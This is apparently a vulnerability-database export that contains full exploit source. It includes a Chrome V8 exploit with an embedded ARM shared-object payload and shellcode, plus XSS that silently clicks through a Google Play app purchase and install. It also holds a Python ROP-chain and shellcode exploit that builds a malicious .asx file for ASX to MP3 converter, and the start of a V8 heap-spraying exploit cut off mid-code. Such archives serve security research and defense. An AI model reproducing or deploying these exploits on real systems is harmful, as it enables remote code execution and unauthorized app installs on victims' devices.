48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\r\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\r\nvar arrayBuffer = new ArrayBuffer(0x1000000);\r\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\r\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\r\nvar args_address = backingStoreAddress+1024;\r\nfunction write_shellcode(dlsym_addr,buffer){\r\n //ldr r0,[pc,4]//0xe59f0004 \r\n //ldr r1,[pc,4]//0xe59f1004\r\n //b shellcode;//0xea000001\r\n //dlopen_addr//array_buffer_address\r\n //dlsym_addr\r\n //shellcode\r\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\r\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\r\n for(var i=0;i<stub.length;i++){\r\n globaldv[buffer/4+i]=stub[i];\r\n }\r\n\r\n shellcode = shellcode.concat([0,0,0,0]);\r\n for(var i=0;i<shellcode.length/4>>>0;i++){\r\n // u8arr[i+4*stub.length]=shellcode[i];\r\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\r\n }\r\n return stub.length*4+shellcode.length;\r\n}\r\n\r\nfunction xss_code(){\r\n //alert(navigator.userAgent);\r\n //alert(document.cookie);\r\n var i1=setInterval(function(){\r\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\r\n console.log(\"wait load complete\");\r\n return;\r\n }\r\n clearInterval(i1);\r\n var i2=setInterval(function(){\r\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\r\n var installButton = document.getElementById(\"purchase-ok-button\");\r\n if(installButton == null)\r\n return;\r\n installButton.click();\r\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\r\n clearInterval(i2);\r\n setTimeout(function(){\r\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\r\n },26000);\r\n },500);\r\n },500);\r\n}\r\n\r\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\r\n//var backup_arr = backup_original_code(huge_func_code_entry);\r\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\r\nvar args_view = new DataView(arrayBuffer,1024,100);\r\nvar so_file_view = new DataView(arrayBuffer,4096);\r\nvar js_view = new DataView(arrayBuffer,0x100000);\r\nargs_view.setUint32(0,dlsym_addr+0xc,true);\r\nargs_view.setUint32(4,dlsym_addr,true);\r\nargs_view.setUint32(8,huge_func_code_entry,true);\r\nargs_view.setUint32(12,writed_len,true);\r\nargs_view.setUint32(16,backingStoreAddress+4096,true);\r\nargs_view.setUint32(20,so_str.length/2,true);\r\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\r\nargs_view.setUint32(28,js_str.length,true);\r\nprint(\"length is \"+so_str.length);\r\nfor(var i=0;i<so_str.length;i+=2){\r\n var value = so_str.substr(i,2);\r\n value = \"0x\"+value;\r\n so_file_view.setUint8(i/2,parseInt(value));\r\n}\r\nfor(var i=0;i<js_str.length;i++){\r\n js_view.setUint8(i,js_str.charCodeAt(i));\r\n}\r\n\r\nprint(\"begin execute shellcode\");\r\nhuge_func({});\r\n\r\nprint(\"done\");\r\npostMessage(true);\r\n//prevent arrayBuffer to be released\r\nwhile(1){}\r\n\r\n}\r\n//main world\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");\r\n}\r\n\r\n// Build a worker from an anonymous function body\r\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\r\n\r\nvar worker;\r\nvar exploitSucc = false;\r\nvar count = 0;\r\nfunction startExploit(){\r\n print(\"worker thread is started\");\r\n worker = new Worker( blobURL );\r\n count++;\r\n worker.onmessage = function(e){\r\n print(\"exploit result is \"+e.data);\r\n exploitSucc = e.data;\r\n if(exploitSucc==false){\r\n startExploit();\r\n return;\r\n }\r\n var end = +new Date();\r\n print(\"time diff is \"+(end-begin)/1000);\r\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\r\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\r\n }\r\n}\r\nvar begin = +new Date();\r\nstartExploit();\r\n\r\nvar savedCount = 0;\r\nvar hangMonitor = setInterval(function (){\r\n if(exploitSucc==true){\r\n clearInterval(hangMonitor);\r\n }else{\r\n if(savedCount==count){//maybe hang\r\n print(\"worker maybe hange\");\r\n worker.terminate();\r\n startExploit();\r\n }else{\r\n print(\"worker is normal\");\r\n savedCount = count;\r\n }\r\n }\r\n},10000);\r\n//URL.revokeObjectURL( blobURL );\r\n\r\n\r\n</script>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42175/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:00", "description": "\nASX to MP3 converter 3.1.3.7 - .asx Local Stack Overflow (DEP Bypass)", "edition": 1, "published": "2017-10-08T00:00:00", "title": "ASX to MP3 converter 3.1.3.7 - .asx Local Stack Overflow (DEP Bypass)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-10-08T00:00:00", "id": "EXPLOITPACK:1C3EE18F5FDEC5CA6AA94E14CA9E7563", "href": "", "sourceData": "import struct,sys\nhead ='''<ASX version=\"3.0\">\n<Entry>\n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''\n\n#offset 17375\njunk = \"A\" *17375\n\n#0x1003df8e\n#0x774e1035\nEIP=\"\\x36\\x10\\x4e\\x77\"\n\nadjust=\"A\" *4\n\ndef create_rop_chain():\n \n rop_gadgets = [\n 0x73dd5dce, # POP EAX # RETN [MFC42.DLL] \n 0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]\n 0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] \n 0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL] \n 0x7c96feb7, # POP EBP # RETN [ntdll.dll] \n 0x7608fcec, # & push esp # ret [MSVCP60.dll]\n 0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll] \n 0xfffffdff, # Value to negate, will become 0x00000201\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \n 0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll] \n 0x01d64827, # POP EAX # RETN [msvos.dll] \n 0xffffffc0, # Value to negate, will become 0x00000040\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \n 0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll] \n 0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll] \n 0x77da1d04, # &Writable location [USER32.dll]\n 0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll] \n 0x76091182, # RETN (ROP NOP) [MSVCP60.dll]\n 0x7d7da123, # POP EAX # RETN [WMVCore.DLL] \n 0x90909090, # nop\n 0x77195015, # PUSHAD # RETN [OLEAUT32.dll] \n ]\n return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\n\t\nrop_chain = create_rop_chain()\n\n#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b \"\\x00\\x0a\\x0d EXITFUNC=seh\n#badcharacters \"\\x00\\x0a\\x0d\"\n\nbuf = \"\"\nbuf += \"\\xda\\xd6\\xba\\xf5\\xa4\\x32\\xf4\\xd9\\x74\\x24\\xf4\\x5d\\x31\"\nbuf += \"\\xc9\\xb1\\x31\\x83\\xc5\\x04\\x31\\x55\\x14\\x03\\x55\\xe1\\x46\"\nbuf += \"\\xc7\\x08\\xe1\\x05\\x28\\xf1\\xf1\\x69\\xa0\\x14\\xc0\\xa9\\xd6\"\nbuf += \"\\x5d\\x72\\x1a\\x9c\\x30\\x7e\\xd1\\xf0\\xa0\\xf5\\x97\\xdc\\xc7\"\nbuf += \"\\xbe\\x12\\x3b\\xe9\\x3f\\x0e\\x7f\\x68\\xc3\\x4d\\xac\\x4a\\xfa\"\nbuf += \"\\x9d\\xa1\\x8b\\x3b\\xc3\\x48\\xd9\\x94\\x8f\\xff\\xce\\x91\\xda\"\nbuf += \"\\xc3\\x65\\xe9\\xcb\\x43\\x99\\xb9\\xea\\x62\\x0c\\xb2\\xb4\\xa4\"\nbuf += \"\\xae\\x17\\xcd\\xec\\xa8\\x74\\xe8\\xa7\\x43\\x4e\\x86\\x39\\x82\"\nbuf += \"\\x9f\\x67\\x95\\xeb\\x10\\x9a\\xe7\\x2c\\x96\\x45\\x92\\x44\\xe5\"\nbuf += \"\\xf8\\xa5\\x92\\x94\\x26\\x23\\x01\\x3e\\xac\\x93\\xed\\xbf\\x61\"\nbuf += \"\\x45\\x65\\xb3\\xce\\x01\\x21\\xd7\\xd1\\xc6\\x59\\xe3\\x5a\\xe9\"\nbuf += \"\\x8d\\x62\\x18\\xce\\x09\\x2f\\xfa\\x6f\\x0b\\x95\\xad\\x90\\x4b\"\nbuf += \"\\x76\\x11\\x35\\x07\\x9a\\x46\\x44\\x4a\\xf0\\x99\\xda\\xf0\\xb6\"\nbuf += \"\\x9a\\xe4\\xfa\\xe6\\xf2\\xd5\\x71\\x69\\x84\\xe9\\x53\\xce\\x74\"\nbuf += \"\\x1b\\x6e\\xda\\xe1\\x82\\x1b\\xa7\\x6f\\x35\\xf6\\xeb\\x89\\xb6\"\nbuf += \"\\xf3\\x93\\x6d\\xa6\\x71\\x96\\x2a\\x60\\x69\\xea\\x23\\x05\\x8d\"\nbuf += \"\\x59\\x43\\x0c\\xee\\x3c\\xd7\\xcc\\xdf\\xdb\\x5f\\x76\\x20\"\n\nshellcode=\"S\"*10+buf\n\nprint \"Length of shellcode is:\",len(shellcode)\nprint \"Length of ropchain is:\",len(rop_chain)\n\nprint\"Calculating Garbage:\",(26000-17375-4-4-len(shellcode)-len(rop_chain))\n\ngarbage= \"C\" *8303\n\nfoot ='''_playlis.wma\"/>\n</Entry>\n</ASX>'''\n\npayload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot\n\nfobj = open(\"exploit.asx\",\"w\")\nfobj.write(payload)\nfobj.close()", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-01T19:04:18", "description": "\nGoogle Chrome - V8 Private Property Arbitrary Code Execution", "edition": 1, "published": "2017-06-14T00:00:00", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-06-14T00:00:00", "id": "EXPLOITPACK:8879BE080DB0C0FD1AB29CF8169D7CC8", "href": "", "sourceData": "<html>\n// Source: https://github.com/secmob/pwnfest2016/\n<script>\nfunction exploit(){\n\nfunction to_hex(num){\n return (num>>>0).toString(16);\n}\nfunction intarray_to_double(int_arr){\n var uBuf = new Uint32Array(2);\n var dBuf = new Float64Array(uBuf.buffer);\n uBuf[0]=int_arr[0];\n uBuf[1]=int_arr[1];\n return dBuf[0];\n}\n\nfunction str_to_double(str){//leng of str must be 8\n var dBuf = new Float64Array(1);\n var u8Buf = new Uint8Array(dBuf.buffer);\n for(var i=0;i<str.length;i++){\n u8Buf[i] = str.charCodeAt(i);\n }\n return dBuf[0];\n}\nfunction double_to_array(value){\n var uBuf = new Uint32Array(2);\n var dBuf = new Float64Array(uBuf.buffer);\n dBuf[0]=value;\n return uBuf;\n}\n\nfunction gc(){\n for(var i=0;i<0x100000/16;i++){\n new String;\n }\n}\nfunction getHiddenValue(){\n var obj = {};\n var oob = \"/re/\";\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\n var str = 'class x extends Array{'+oob+\"}\";\n var fun = eval(str);\n Object.assign(obj,fun);\n return obj;\n}\nvar obWin;\nfunction makeOobString(){\n var hiddenValue = getHiddenValue();\n var magicStr = \"bbbb\";\n var arr=[];\n var str = 'class x extends Array{}';\n for(var i=0;i<str.length;i++){\n arr[i]=str.charCodeAt(i);\n }\n var ob = new Array(0x200);\n ob.fill(0x31313131);\n gc();\n gc();\n str=String.fromCharCode.apply(null,arr);\n ob=ob.concat(0x32323232);\n var fun = eval(str); \n ob[2]=str;\n ob[3]=ob;\n Object.assign(fun,hiddenValue);\n var oobString = fun.toString();\n gc();\n gc();\n print(\"begin search\");\n var subStr = oobString.substr(0,0x8000);\n var pos = subStr.indexOf(magicStr);\n print(\"end search\");\n if(pos==-1){\n print(\"find magic failed\");\n postMessage(false);\n self.close();\n print(\"unpossible\");\n throw \"error\";\n }else{\n print(\"find magic at \"+pos);\n\n }\n oobString = oobString.substr(pos,ob.length*4);\n obWin=ob;\n return oobString;\n}\nvar oobString = makeOobString();\nprint(\"get oob string successfully\");\nfunction print(){\n console.log.apply(null,arguments);\n /*document.write('<p >');\n document.write.apply(document,arguments);\n document.write(\"<p>\");*/\n}\nfunction str2arr(str,len){//len must be multile of 4\n if(len===undefined)\n len = str.length;\n var u8a = new Uint8Array(len);\n for(var i=0;i<len;i++){\n u8a[i] = str.charCodeAt(i);\n }\n return new Uint32Array(u8a.buffer);\n}\nfunction pArrayInHex(arr){\n var result=\"<p style='font-size:8px'>\";\n for(var i=0;i<arr.length;i++){\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\n result+=\" \";\n if(i%8==7)\n result+=\"<p style='font-size:8px'>\";\n }\n result+=\"<p>\";\n print(result);\n //alert(result);\n return result;\n}\nfunction pStrInHex(str){\n //var result=\"<p style='font-size:8px'>\";\n var result=\"\\n\";\n for(var i=0;i<str.length;i++){\n var code = str.charCodeAt(i);\n result+=(code+0x100).toString(16).substr(-2);\n if(i%4==3)\n result+=\" \";\n if(i%32==31)\n // result+=\"<p style='font-size:8px'>\";\n result+=\"\\n\";\n }\n // result+=\"<p>\";\n result+=\"\\n\";\n print(result);\n return result;\n}\nfunction getObjAddr(obj){\n obWin[0]=obj;\n var value2= ((str2arr(oobString,4))[0]);\n return value2>>>0;\n}\n\nvar getObj24BitsAddr = function(){\n var smi=0;\n var code = 0;\n var i=0;\n //don't allocate heap object\n function getAddr(obj){\n obWin[0]=obj;\n value=0;\n code = 0;\n i=0;\n for(i=2;i>=0;i--){\n code = oobString.charCodeAt(i);\n value = code+value*256;\n }\n return value;\n }\n return getAddr;\n}();\n\n\nvar lengthInOldSpace = 0xfffffffc;\nvar abarr=new Array(800);\nfunction sprayVM(){\n var i=0;\n var j=0;\n try{\n for(i=0;i<20;i++){\n var u8 = new Uint8Array(0x10000000-0x500);\n abarr[i]=u8;\n }\n }catch(e){}\n try{\n for(j=0;j<100;j++){\n var u8 = new Uint8Array(0x8000000-0x500);\n abarr[i+j]=u8;\n }\n }catch(e){}\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\n function getRandomInt(min, max) {\n min = Math.ceil(min);\n max = Math.floor(max);\n return Math.floor(Math.random() * (max - min)) + min;\n }\n delete abarr[getRandomInt(0,i)];\n}\n\n\nfunction getNewSpaceAddrs(){\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\n str+=\"%\";*/\n var objsInNewSpace = new Array(80);\n for(var i=0;i<objsInNewSpace.length;i++){\n //var xx=escape(str);\n var xx = new Array(0x70000/4);\n objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\n //\u4f7fnewspace\u66f4\u79bb\u6563\n new Uint8Array(0x100000-0x500);\n new Uint8Array(0x100000-0x500);\n }\n function compareNumbers(a, b) {\n return a - b;\n }\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\n return objsInNewSpace;\n}\n\n\nprint(\"begin get new space address\");\nvar objsInNewSpace = getNewSpaceAddrs();\nwhile(objsInNewSpace.length<16){\n objsInNewSpace = getNewSpaceAddrs();\n print(\"new space addresses\");\n pArrayInHex(objsInNewSpace);\n}\n\ntry{\nsprayVM();\n}catch(e){}\n\nvar selectedTrunk = 0;\nvar selectedStr = \"\";\nfunction bruteForceFengShui(){\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\n huge_str +=\"%\";\n var hold = new Array(100);\n //var holdaddress = new Array(100);\n for(var i=0;;i++){\n var large = escape(huge_str);\n var addr = getObjAddr(large);\n //console.log(addr.toString(16) + \" \"+i);\n if(i<hold.length){\n hold[i]=large;\n //holdaddress[i]=addr;\n }\n addr=(addr&0xfff00000)>>>0;\n addr = addr-0x100000;\n if(objsInNewSpace.indexOf(addr)!=-1){\n selectedTrunk = addr;\n selectedStr = large;\n abarr.fill(1);\n hold.fill(1);\n //holdaddress.fill(1);\n break;\n }\n if(i===150){\n /*i=0;\n print(\"tried 200 times\");\n abarr.fill(1);\n try{\n sprayVM();\n }catch(e){};*/\n postMessage(false);\n close();\n throw \"exceed limits\";\n }\n }\n}\nbruteForceFengShui();\n//to avoid allocate memory latter, initilize here\nvar nextTrunk = selectedTrunk + 0x100000;\n\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\nvar huge_str = \"eval('');\";\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\nhuge_str += \"return 10;\";\nvar huge_func = new Function('a',huge_str);\nhuge_func({});\n\nfunction fillNewSpace(origObj){\n //first object in new space at 0x8100, new spaces layout\n //0x40000\n //0x37f00\n //.....\n //0x40000\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\n var gap = gap+\"%\";\n //flat gap\n gap.substr(0,100);\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\n fillstr = escape(fillstr);\n var addr=0;\n for(var i=0;i<0x100;i++){\n addr = getObj24BitsAddr(origObj);\n if((addr&0xfffff)===0x8101)\n origObj=escape(gap);\n else\n origObj=unescape(fillstr);\n }\n}\n\nfunction findNewSpace(){\n var kMaxRegularHeapObjectSize =523776;// 507136;\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\n str+=\"%\";\n for(var i=0;;i++){\n var xx=escape(str);\n var straddr = getObjAddr(xx);\n addr=(straddr&0xfff00000)>>>0;\n if(addr===selectedTrunk){\n print(\"good state \"+straddr.toString(16));\n break;\n }\n }\n}\n\nfunction myencode(str){\n var arr = [];\n for(var i=0;i<str.length;i++){\n if(i%2==1)\n arr.push(str.charCodeAt(i));\n else{\n arr.push(37);//%\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\n arr.push(hexstr.charCodeAt(0));\n arr.push(hexstr.charCodeAt(1));\n }\n }\n return String.fromCharCode.apply(null,arr);\n}\n\nvar dArray = [];\nvar index = (0x8100-36)*2;\nfor(var i=0;i<0x20000/8;i++){\n dArray[i]=str_to_double(\"%03x%03x\");\n}\n\nvar occulen = 0;\nvar i = 0;\nvar savedChunk = new Uint8Array(0x8100);\nvar hiddenValue = getHiddenValue();\nvar arr=[];\nfillNewSpace(new String);\nfindNewSpace();\nvar classStr = 'class x extends Array{}';\nfor(var i=0;i<classStr.length;i++){\n arr[i]=classStr.charCodeAt(i);\n}\nvar magicStr = 